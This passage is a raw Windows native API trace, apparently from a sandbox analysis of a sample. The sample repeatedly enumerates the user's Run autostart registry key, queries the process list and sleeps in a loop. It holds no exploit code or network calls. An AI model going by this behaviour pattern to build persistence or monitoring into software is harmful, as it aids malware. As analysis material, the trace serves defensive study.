KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.949] NtClose (Handle=0xec) returned 0x0 [0188.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.953] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.964] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.964] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.964] NtClose (Handle=0xec) returned 0x0 [0188.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.967] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.979] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.979] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.979] NtClose (Handle=0xec) returned 0x0 [0188.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.983] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.995] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.995] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.995] NtClose (Handle=0xec) returned 0x0 [0188.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.999] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.017] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.017] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.017] NtClose (Handle=0xec) returned 0x0 [0189.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.021] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.025] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.026] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.026] NtClose (Handle=0xec) returned 0x0 [0189.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.029] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.041] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.041] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.041] NtClose (Handle=0xec) returned 0x0 [0189.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.045] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.057] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.057] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.057] NtClose (Handle=0xec) returned 0x0 [0189.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.061] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.073] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.073] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.073] NtClose (Handle=0xec) returned 0x0 [0189.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.077] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.088] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.088] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.088] NtClose (Handle=0xec) returned 0x0 [0189.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.093] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.104] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.104] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.104] NtClose (Handle=0xec) returned 0x0 [0189.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.108] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.119] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.119] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.119] NtClose (Handle=0xec) returned 0x0 [0189.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.124] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.135] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.135] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.135] NtClose (Handle=0xec) returned 0x0 [0189.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0189.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0189.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0189.140] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0189.150] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0189.150] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0189.150] NtClose (Handle=0xec) returned 0x0 [0189.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0189.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0189.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0189.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, 